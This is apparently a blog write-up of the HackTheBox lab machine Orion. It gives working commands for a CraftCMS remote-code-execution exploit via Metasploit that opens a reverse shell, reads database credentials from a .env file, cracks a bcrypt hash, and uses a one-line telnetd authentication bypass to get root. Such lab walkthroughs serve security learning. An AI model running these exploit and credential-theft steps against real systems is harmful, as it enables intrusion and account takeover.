← Back to CTF
HTB Very Easy 2 min read

Orion

Walkthrough of the HackTheBox machine Orion: exploiting an unauthenticated RCE in CraftCMS 5.6.16 (CVE-2025-32432) via CSRF bypass and Yii object injection, cracking a bcrypt hash from the MySQL database for SSH access, then escalating to root by abusing a telnetd authentication bypass (CVE-2026-24061).

HackTheBoxCraftCMSCVE-2025-32432CSRF BypassYiiObject InjectionBcryptTelnetdCVE-2026-24061
Platform HackTheBox Difficulty Very Easy Author Rana Uzair Ahmad
Orion

Enumeration

$ nmap -sCV 10.129.x.x
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://orion.htb/
$ echo "10.129.x.x orion.htb" | sudo tee -a /etc/hosts

Directory fuzzing confirms the admin panel at /admin. The login page footer discloses Craft CMS 5.6.16, which is vulnerable to unauthenticated RCE via CVE-2025-32432.

$ ffuf -u http://orion.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic
admin    [Status: 302]

Foothold

CVE-2025-32432 abuses CraftCMS’s image transformation endpoint, which passes attacker-controlled JSON into Yii’s object configuration system. Three values are needed: CraftSessionId cookie, CRAFT_CSRF_TOKEN cookie, and csrfTokenValue — all obtained from a single GET to /admin/login.

$ msfconsole
msf > use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
msf exploit(...) > set rhosts orion.htb
msf exploit(...) > set rport 80
msf exploit(...) > set lhost 10.10.14.x
msf exploit(...) > exploit

[+] Leaked session.save_path: /var/lib/php/sessions
[*] Meterpreter session 1 opened

meterpreter > shell
$ script /dev/null -c /bin/bash
www-data@orion:~/html/craft$

Privilege Escalation

www-data → adam

www-data@orion:~/html/craft$ cat .env
CRAFT_DB_USER=root
CRAFT_DB_PASSWORD=SuperSecureCraft123Pass!
www-data@orion:~/html/craft$ mysql -u root -pSuperSecureCraft123Pass! orion \
  -e "select username,email,password from users;"
| admin | adam@orion.htb | $2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS |
$ hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
$2y$13$...:<REDACTED>
$ ssh adam@orion.htb
adam@orion:~$ cat user.txt
<REDACTED>

adam → root

adam@orion:~$ netstat -tulnp
tcp    127.0.0.1:23     LISTEN

Port 23 is GNU inetutils 2.7 telnetd, vulnerable to CVE-2026-24061. Setting USER to -f root passes -f root to login(1), which skips password authentication entirely.

adam@orion:~$ USER="-f root" telnet -a 127.0.0.1

root@orion:~# cat root.txt
<REDACTED>

// Discussion

Enjoyed this? Let us work together.

I am open to security internships and junior roles.